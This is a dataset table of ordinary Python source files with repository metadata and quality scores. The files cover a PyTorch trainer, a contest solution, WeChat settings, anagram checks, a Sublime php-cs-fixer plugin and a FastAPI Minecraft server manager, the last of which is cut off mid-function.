hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
822a641495e4387a0c1f14cf9ebd06d65a7a819c | 7,355 | py | Python | jdit/trainer/single/sup_single.py | dingguanglei/jdit | ef878e696c9e2fad5069f106496289d4e4cc6154 | [
"Apache-2.0"
] | 28 | 2019-06-18T15:56:53.000Z | 2021-11-09T13:11:13.000Z | jdit/trainer/single/sup_single.py | dingguanglei/jdit | ef878e696c9e2fad5069f106496289d4e4cc6154 | [
"Apache-2.0"
] | 2 | 2018-10-24T01:09:56.000Z | 2018-11-08T07:13:48.000Z | jdit/trainer/single/sup_single.py | dingguanglei/jdit | ef878e696c9e2fad5069f106496289d4e4cc6154 | [
"Apache-2.0"
] | 8 | 2019-01-11T01:12:15.000Z | 2021-03-12T10:15:43.000Z | from ..super import SupTrainer
from tqdm import tqdm
import torch
from jdit.optimizer import Optimizer
from jdit.model import Model
from jdit.dataset import DataLoadersFactory
class SupSingleModelTrainer(SupTrainer):
""" This is a Single Model Trainer.
It means you only have one model.
input, gound_truth
output = model(input)
loss(output, gound_truth)
"""
def __init__(self, logdir, nepochs, gpu_ids_abs, net: Model, opt: Optimizer, datasets: DataLoadersFactory):
super(SupSingleModelTrainer, self).__init__(nepochs, logdir, gpu_ids_abs=gpu_ids_abs)
self.net = net
self.opt = opt
self.datasets = datasets
self.fixed_input = None
self.input = None
self.output = None
self.ground_truth = None
def train_epoch(self, subbar_disable=False):
for iteration, batch in tqdm(enumerate(self.datasets.loader_train, 1), unit="step", disable=subbar_disable):
self.step += 1
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
self.output = self.net(self.input)
self._train_iteration(self.opt, self.compute_loss, csv_filename="Train")
if iteration == 1:
self._watch_images("Train")
def get_data_from_batch(self, batch_data: list, device: torch.device):
""" Load and wrap data from the data lodaer.
Split your one batch data to specify variable.
Example::
# batch_data like this [input_Data, ground_truth_Data]
input_cpu, ground_truth_cpu = batch_data[0], batch_data[1]
# then move them to device and return them
return input_cpu.to(self.device), ground_truth_cpu.to(self.device)
:param batch_data: one batch data load from ``DataLoader``
:param device: A device variable. ``torch.device``
:return: input Tensor, ground_truth Tensor
"""
input_tensor, ground_truth_tensor = batch_data[0], batch_data[1]
return input_tensor, ground_truth_tensor
def _watch_images(self, tag: str, grid_size: tuple = (3, 3), shuffle=False, save_file=True):
""" Show images in tensorboard
To show images in tensorboad. If want to show fixed input and it's output,
please use ``shuffle=False`` to fix the visualized data.
Otherwise, it will sample and visualize the data randomly.
Example::
# show fake data
self.watcher.image(self.output,
self.current_epoch,
tag="%s/output" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
# show ground_truth
self.watcher.image(self.ground_truth,
self.current_epoch,
tag="%s/ground_truth" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
# show input
self.watcher.image(self.input,
self.current_epoch,
tag="%s/input" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
:param tag: tensorboard tag
:param grid_size: A tuple for grad size which data you want to visualize
:param shuffle: If shuffle the data.
:param save_file: If save this images.
:return:
"""
self.watcher.image(self.output,
self.current_epoch,
tag="%s/output" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
self.watcher.image(self.ground_truth,
self.current_epoch,
tag="%s/ground_truth" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
def compute_loss(self) -> (torch.Tensor, dict):
""" Rewrite this method to compute your own loss Discriminator.
Use self.input, self.output and self.ground_truth to compute loss.
You should return a **loss** for the first position.
You can return a ``dict`` of loss that you want to visualize on the second position.like
Example::
var_dic = {}
var_dic["LOSS"] = loss_d = (self.output ** 2 - self.groundtruth ** 2) ** 0.5
return: loss, var_dic
"""
loss: torch.Tensor
var_dic = {}
return loss, var_dic
def compute_valid(self) -> dict:
""" Rewrite this method to compute your validation values.
Use self.input, self.output and self.ground_truth to compute valid loss.
You can return a ``dict`` of validation values that you want to visualize.
Example::
# It will do the same thing as ``compute_loss()``
var_dic, _ = self.compute_loss()
return var_dic
"""
# It will do the same thing as ``compute_loss()``
var_dic, _ = self.compute_loss()
return var_dic
def valid_epoch(self):
"""Validate model each epoch.
It will be called each epoch, when training finish.
So, do same verification here.
Example::
avg_dic: dict = {}
self.net.eval()
for iteration, batch in enumerate(self.datasets.loader_valid, 1):
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
with torch.no_grad():
self.output = self.net(self.input)
dic: dict = self.compute_valid()
if avg_dic == {}:
avg_dic: dict = dic
else:
for key in dic.keys():
avg_dic[key] += dic[key]
for key in avg_dic.keys():
avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid
self.watcher.scalars(avg_dic, self.step, tag="Valid")
self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.step <= 1)
self._watch_images(tag="Valid")
self.net.train()
"""
avg_dic: dict = {}
self.net.eval()
for iteration, batch in enumerate(self.datasets.loader_valid, 1):
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
with torch.no_grad():
self.output = self.net(self.input)
dic: dict = self.compute_valid()
if avg_dic == {}:
avg_dic: dict = dic
else:
# 求和
for key in dic.keys():
avg_dic[key] += dic[key]
for key in avg_dic.keys():
avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid
self.watcher.scalars(avg_dic, self.step, tag="Valid")
self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.current_epoch <= 1)
self._watch_images(tag="Valid")
self.net.train()
def test(self):
pass
| 37.146465 | 116 | 0.562882 | 885 | 7,355 | 4.501695 | 0.19096 | 0.027108 | 0.03012 | 0.023845 | 0.500251 | 0.477159 | 0.433986 | 0.416918 | 0.416918 | 0.398845 | 0 | 0.003537 | 0.346431 | 7,355 | 197 | 117 | 37.335025 | 0.825255 | 0.4707 | 0 | 0.176471 | 0 | 0 | 0.016552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.014706 | 0.088235 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822adefd2d61243c8a6b7d51a859f435ee02768e | 1,433 | py | Python | Gold/sol.py | papachristoumarios/IEEEXtreme11.0 | 4c3b5aaa71641a6d0b3e9823c4738050f2553b27 | [
"MIT"
] | 13 | 2018-10-11T14:13:56.000Z | 2022-02-17T18:30:17.000Z | Gold/sol.py | papachristoumarios/IEEEXtreme11.0-PComplete | 4c3b5aaa71641a6d0b3e9823c4738050f2553b27 | [
"MIT"
] | null | null | null | Gold/sol.py | papachristoumarios/IEEEXtreme11.0-PComplete | 4c3b5aaa71641a6d0b3e9823c4738050f2553b27 | [
"MIT"
] | 7 | 2018-10-24T08:36:59.000Z | 2021-07-19T18:16:53.000Z | import heapq
import sys
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53]
bounds = [1]
for pr in primes:
bounds.append(bounds[-1]*pr)
def gold(town_id):
i = 0
while bounds[i] <= town_id:
i += 1
return i - 1
def solve():
N, M = [int(i) for i in raw_input().split()]
ids = [int(raw_input()) for _ in xrange(N)]
town_gold = {town_id: gold(town_id) for town_id in ids}
adj = {}
for i in ids:
adj[i] = []
for _ in xrange(M):
i, j, w = [int(i) for i in raw_input().split()]
adj[i].append((j, w))
adj[j].append((i, w))
start, end = min(ids), max(ids)
visited = set()
max_dist = sys.maxint/2
min_dist = {town_id: max_dist for town_id in ids}
min_dist[start] = 0
queue = [(0, -gold(start), start)]
while queue:
curr_dist, curr_gold, curr_node = heapq.heappop(queue)
if curr_node in visited:
continue
if curr_node == end:
print -curr_gold
break
for next_node, dist in adj[curr_node]:
if next_node in visited:
continue
next_dist = curr_dist + dist
if min_dist[next_node] >= next_dist:
min_dist[next_node] = next_dist
heapq.heappush(queue, (next_dist, curr_gold-town_gold[next_node], next_node))
def main():
solve()
if __name__ == "__main__":
main()
| 26.537037 | 93 | 0.551291 | 222 | 1,433 | 3.346847 | 0.297297 | 0.056528 | 0.040377 | 0.021534 | 0.161507 | 0.123822 | 0.061911 | 0.061911 | 0 | 0 | 0 | 0.036735 | 0.31612 | 1,433 | 53 | 94 | 27.037736 | 0.721429 | 0 | 0 | 0.043478 | 0 | 0 | 0.005583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.043478 | 0 | 0.130435 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822bbf9836e86e5cf6fb48c971df002aa5f8085b | 511 | py | Python | src/wechat/settings.py | chuter/wechat-requests | 23591f8e04e795a1727e6a8029602cfb2dde90f1 | [
"MIT"
] | 3 | 2019-06-17T10:54:03.000Z | 2021-01-29T08:25:01.000Z | src/wechat/settings.py | chuter/wechat-requests | 23591f8e04e795a1727e6a8029602cfb2dde90f1 | [
"MIT"
] | 2 | 2020-03-24T15:46:37.000Z | 2020-03-30T20:26:19.000Z | src/wechat/settings.py | chuter/wechat-requests | 23591f8e04e795a1727e6a8029602cfb2dde90f1 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8
from .utils import build_user_agent
# common
DEFAULT_HEADERS = {
'User-Agent': build_user_agent()
}
TIMEOUT = 1
ENCODING = 'utf-8'
RETRYS = 3
RETRY_BACKOFF_FACTOR = 0.1
RETRY_STATUS_FORCELIST = frozenset([500, 502, 504])
# auth
OAUTH_HOST = 'open.weixin.qq.com'
AUTH_EXPIRED_CODES = frozenset([40001, 40014, 41001, 42001])
# pay
TRADE_TYPE_JSAPI = 'JSAPI' # 公众号支付
TRADE_TYPE_NATIVE = 'NATIVE' # 扫码支付
TRADE_TYPE_APP = 'APP' # APP支付
SIGN_TYPE = 'MD5'
SIGN_NONCE_STR_LEN = 32
| 17.033333 | 60 | 0.712329 | 75 | 511 | 4.56 | 0.72 | 0.078947 | 0.070175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088785 | 0.162427 | 511 | 29 | 61 | 17.62069 | 0.71028 | 0.101761 | 0 | 0 | 0 | 0 | 0.110865 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822c63b5e55693f8beb5a21c86e5722b43fcabfd | 1,070 | py | Python | leetcode/0242_valid_anagram.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
] | null | null | null | leetcode/0242_valid_anagram.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
] | null | null | null | leetcode/0242_valid_anagram.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
] | null | null | null | """
Given two strings s and t , write a function to determine if t is an anagram of s.
Example 1:
Input: s = "anagram", t = "nagaram"
Output: true
Example 2:
Input: s = "rat", t = "car"
Output: false
Note:
You may assume the string contains only lowercase alphabets.
Follow up:
What if the inputs contain unicode characters? How would you adapt your solution to such case?
"""
from collections import Counter
class Solution:
def isAnagram1(self, s, t):
return sorted(s) == sorted(t)
def isAnagram2(self, s, t):
if len(s) != len(t):
return False
d_s = {}
d_t = {}
for ss, tt in zip(s, t):
if ss in d_s:
d_s[ss] += 1
else:
d_s[ss] = 1
if tt in d_t:
d_t[tt] += 1
else:
d_t[tt] = 1
return d_s == d_t
def isAnagram3(self, s, t): # 28ms, 13MB
return Counter(s) == Counter(t) if len(s) == len(t) else False
| 22.291667 | 98 | 0.507477 | 155 | 1,070 | 3.43871 | 0.464516 | 0.018762 | 0.033771 | 0.026266 | 0.041276 | 0.041276 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.392523 | 1,070 | 47 | 99 | 22.765957 | 0.8 | 0.382243 | 0 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.047619 | 0.095238 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
822e6649f5126724e28587501bc18c3cf971a81b | 4,144 | py | Python | phpcsfixer.py | makao/sublime-php-cs-fixer | ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5 | [
"MIT"
] | 1 | 2018-11-26T19:42:41.000Z | 2018-11-26T19:42:41.000Z | phpcsfixer.py | makao/sublime-php-cs-fixer | ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5 | [
"MIT"
] | 2 | 2018-01-10T05:15:08.000Z | 2018-12-04T15:41:29.000Z | phpcsfixer.py | makao/sublime-php-cs-fixer | ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5 | [
"MIT"
] | null | null | null | import os
import re
import sublime
import sublime_plugin
import subprocess
STVER = int(sublime.version())
class PHPCSFixer():
def __init__(self):
self.settings = PhpCsFixerSettings()
if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
self.file = sublime.active_window().active_view().file_name()
def run(self, file=None):
if file is None:
file = self.file
if not self.settings.isPHPFile():
return
if not self.settings.isAllowedExtension(file):
return
cmd = self.buildCommand(file)
result = self.execute(cmd)
self.showOutput(result)
def buildCommand(self, file):
rules = self.settings.get('rules')
if (self.settings.get('executable')):
cmd = [self.settings.get('executable')]
else:
cmd = ['php-cs-fixer']
cmd.append('fix');
cmd.append(os.path.normpath(file))
cmd.append('-vvv')
cmd.append('--using-cache=no')
if rules is None or not rules:
return cmd
rules_list = '--rules='
for rule in rules:
rules_list += rule + ','
cmd.append(rules_list[:-1])
return cmd
def execute(self, cmd):
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return process.communicate()[0].decode()
def showOutput(self, result):
lines = re.finditer('.*(?P<line>\d+)\) (?P<file>.*)', result)
files = []
for line in lines:
file = line.group('file')
rules = file[file.find("(")+1:file.find(")")]
file = re.sub('\(.*?\)','', file)
files.append([os.path.basename(file), rules])
sublime.active_window().show_quick_panel(files, self.onDone)
def onDone(selected, self):
return
class PhpCsFixerFixCommand(sublime_plugin.TextCommand):
def run(edit, self):
PHPCSFixer().run()
class PhpCsFixerEventListener(sublime_plugin.EventListener):
def on_post_save(self, view):
settings = PhpCsFixerSettings()
if not settings.get('on_save'):
return
PHPCSFixer().run(view.file_name())
class PhpCsFixerSettings():
def __init__(self):
if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
self.sublime = sublime.active_window().active_view().settings()
self.project = self.sublime.get('php-cs-fixer')
else:
self.sublime = {}
self.project = {}
self.plugin = sublime.load_settings('PHPCSFixer.sublime-settings')
def get(self, key, default=None):
if self.project is not None and self.project.get(key) is not None:
return self.project.get(key)
if self.plugin.get(key) is not None:
return self.plugin.get(key)
return default
def isPHPFile(self):
syntax = self.sublime.get('syntax')
if syntax is None:
return False
if syntax.endswith('PHP.tmLanguage') or syntax.endswith('PHP.sublime-syntax'):
return True
return False
def isAllowedExtension(self, filename):
ignored = self.get('ignored_extensions', [])
for ext in ignored:
if filename.endswith(ext):
return False
return True
class PhpCsFixerOpenFileCommand(sublime_plugin.ApplicationCommand):
@staticmethod
def run(file):
platform_name = {
'osx': 'OSX',
'windows': 'Windows',
'linux': 'Linux',
}[sublime.platform()]
file = file.replace('${platform}', platform_name)
sublime.run_command('open_file', {'file': file})
@staticmethod
def is_visible():
return STVER < 3124
class PhpCsFixerEditSettingsCommand(sublime_plugin.ApplicationCommand):
@staticmethod
def run(**kwargs):
sublime.run_command('edit_settings', kwargs)
@staticmethod
def is_visible():
return STVER >= 3124
| 27.812081 | 112 | 0.600386 | 464 | 4,144 | 5.267241 | 0.247845 | 0.037234 | 0.054419 | 0.040917 | 0.177578 | 0.153846 | 0.113748 | 0.061375 | 0.061375 | 0.061375 | 0 | 0.003663 | 0.275338 | 4,144 | 148 | 113 | 28 | 0.81019 | 0 | 0 | 0.211009 | 0 | 0 | 0.067809 | 0.006515 | 0 | 0 | 0 | 0 | 0 | 1 | 0.146789 | false | 0 | 0.045872 | 0.027523 | 0.40367 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8234be85b1a5c920b993e015367a06c4e394d65b | 11,961 | py | Python | main.py | iTecAI/minecraft-socket | 72f3bbc4fb20bea4b837d093c734eab2798de89d | [
"MIT"
] | null | null | null | main.py | iTecAI/minecraft-socket | 72f3bbc4fb20bea4b837d093c734eab2798de89d | [
"MIT"
] | null | null | null | main.py | iTecAI/minecraft-socket | 72f3bbc4fb20bea4b837d093c734eab2798de89d | [
"MIT"
] | null | null | null | from json.decoder import JSONDecodeError
from fastapi import FastAPI, Response, Request
from fastapi.staticfiles import StaticFiles
from argparse import ArgumentParser
from starlette.status import *
from starlette.responses import FileResponse, JSONResponse
import uvicorn
import os
from pymongo import MongoClient
from pymongo.database import Database
import json
from util import fetch_jarinfo, defaults
import logging
from logging import debug, info, warning, error, critical, exception
import threading
import time
from models import *
import hashlib
import random
import server_manager
import requests
import base64
AUTHENTICATED_CONNECTIONS = {}
def fetch_loop(db: Database):
WAIT = 12 # Delay between fetches (hours)
while True:
info('Fetching minecraft version info.')
jar_info = fetch_jarinfo()
jar_info['record'] = 'versions'
info('Found {mc} vanilla versions and {paper} papermc versions. Latest version is {latest}. Latest snapshot is {latest_snap}.'.format(
mc=str(len(jar_info['vanilla'])),
paper=str(len(jar_info['paper'])),
latest=jar_info['latest']['release'],
latest_snap=jar_info['latest']['snapshot']
))
db.versions.replace_one({'record': 'versions'}, jar_info, upsert=True)
time.sleep(WAIT * 3600)
if __name__ == '__main__':
parser = ArgumentParser(description='Run minecraft-socket server.')
parser.add_argument('--config', default='config.json', help='Path to config file (JSON)')
args = parser.parse_args()
try:
with open(args.config, 'r') as c:
os.environ['MC-CONFIG'] = json.dumps(json.load(c))
except JSONDecodeError:
print('FATAL: Bad JSON structure.')
exit(0)
except FileNotFoundError:
print(f'FATAL: {args.config} not found.')
exit(0)
CONF = json.loads(os.environ['MC-CONFIG'])
uvicorn.run('main:app', host=CONF['runtime']['host'], port=CONF['runtime']['port'], access_log=False)
else:
try:
CONFIG = json.loads(os.environ['MC-CONFIG'])
except:
print(f'FATAL: config not loaded.')
exit(0)
logging.basicConfig(
format=CONFIG["logging"]["format"],
level=logging.getLevelName(CONFIG["logging"]["level"].upper()),
)
info('Loading connection to DB')
db = CONFIG['database']
mongodb = MongoClient(
host=db['ip'],
port=db['port'],
username=db['username'],
password=db['password'],
tls=db['secure']
)
database = mongodb.minecraft_socket
info('Starting fetch thread.')
fetch_thread = threading.Thread(target=fetch_loop, name='mcjar_fetch_thread', daemon=True, args=[database])
fetch_thread.start()
info('Checking env setup.')
if not os.path.exists(CONFIG['server_folder']):
os.makedirs(CONFIG['server_folder'])
info('Starting server manager.')
manager = server_manager.ServerManager(CONFIG['server_folder'], database)
app = FastAPI()
app.mount('/web', StaticFiles(directory='web'), 'staticfiles')
@app.get('/')
async def get_index():
return FileResponse(os.path.join('web', 'index.html'))
@app.middleware('http')
async def auth(request: Request, call_next):
for k in list(AUTHENTICATED_CONNECTIONS.keys()):
if AUTHENTICATED_CONNECTIONS[k]+CONFIG['connection_timeout'] < time.time():
del AUTHENTICATED_CONNECTIONS[k]
if request.url.path == '/' or request.url.path.startswith('/web') or request.url.path == '/auth':
return await call_next(request)
else:
if 'x-authkey' in request.headers.keys():
if request.headers['x-authkey'] in AUTHENTICATED_CONNECTIONS.keys():
return await call_next(request)
else:
return JSONResponse({'result': 'failure', 'reason': 'Auth key not recognized.'}, HTTP_403_FORBIDDEN)
else:
return JSONResponse({'result': 'failure', 'reason': 'Auth key not passed in headers.'}, HTTP_403_FORBIDDEN)
@app.post('/auth')
async def post_auth(request: Request, response: Response):
model = await request.json()
hashed_pass = hashlib.sha256(CONFIG['password'].encode('utf-8')).hexdigest()
if hashed_pass == model['passhash']:
cid = hashlib.sha256(str(time.time()+random.random()).encode('utf-8')).hexdigest()
AUTHENTICATED_CONNECTIONS[cid] = time.time()
return {'result': 'success', 'connection_id': cid}
else:
response.status_code = HTTP_403_FORBIDDEN
return {'result': 'failure', 'reason': 'Incorrect passcode.'}
@app.get('/versions')
async def get_versions(response: Response, request: Request):
try:
res = database.versions.find_one({'record': 'versions'})
del res['_id']
del res['record']
return res
except:
return {
'latest': {'release': None, 'snapshot': None},
'paper': {},
'vanilla': {}
}
@app.post('/servers/new')
async def new_server(req: Request, res: Response):
fields = defaults(await req.json(), defs={
'max_memory': 2, # GB
'name': f'server_{int(time.time())}',
'server_port': 25565,
'server_ip': '',
'world_seed': '',
'whitelist': True,
'max_players': 20,
'difficulty': 'hard',
'gamemode': 'survival',
'motd': 'Minecraft Server Running on Minecraft-Socket [iTecAI]',
'command_blocks': True,
'other_args': ''
}) # also requires {jar: url or base-64 encoded jar}
if os.path.exists(os.path.join(CONFIG['server_folder'], fields['name'])):
res.status_code = HTTP_405_METHOD_NOT_ALLOWED
return {'result': 'failure', 'reason': f'Server {fields["name"]} already exists.'}
if not 'jar' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Server jar not specified'}
info(f'Creating new server {fields["name"]} running at {fields["server_ip"]}:{fields["server_port"]}.')
os.mkdir(os.path.join(CONFIG['server_folder'], fields['name']))
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'eula.txt'), 'w') as f:
f.write('eula=true')
with open('server.properties.template', 'r') as f:
properties = f.read().format(
gamemode=fields['gamemode'],
cmdblocks='true' if fields['command_blocks'] else 'false',
motd=fields['motd'],
seed=fields['world_seed'],
difficulty=fields['difficulty'],
max_players=str(fields['max_players']),
server_ip=fields['server_ip'],
server_port=str(fields['server_port']),
whitelist='true' if fields['whitelist'] else 'false'
)
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.properties'), 'w') as f:
f.write(properties)
database.servers.insert_one({
'max_memory': fields['max_memory'],
'name': fields['name'],
'java_args': fields['other_args'],
'address': fields['server_ip']+':'+str(fields['server_port']),
'enabled': True
})
if 'https://' in fields['jar'] or 'http://' in fields['jar']:
response = requests.get(fields['jar'], stream=True)
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
for chunk in response.iter_content(chunk_size=128):
fd.write(chunk)
else:
with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd:
fd.write(base64.b64decode(fields['jar'].split('base64,')[1].encode('utf-8')))
manager.start_server(fields['name'])
return {'result': 'success'}
@app.post('/servers/{name}/stop')
async def stop_server(name: str, res: Response):
try:
manager.stop_server(name)
return {'result': 'success'}
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/delete')
async def delete_server(name: str, res: Response):
try:
manager.stop_server(name)
except KeyError:
pass
database.servers.delete_one({'name': name})
return {'result': 'success'}
@app.get('/servers/{name}/logs')
async def get_logs(name: str, res: Response):
try:
manager.get_logs(name)
return {'result': 'success', 'logs': manager.get_logs(name)}
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
@app.post('/servers/{name}/command')
async def command_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'command' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Command not passed'}
try:
manager.command_server(name, fields['command'])
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} not online.'}
return {'result': 'success'}
@app.post('/servers/{name}/start')
async def start_server(name: str, res: Response):
try:
manager.start_server(name)
except KeyError:
res.status_code = HTTP_404_NOT_FOUND
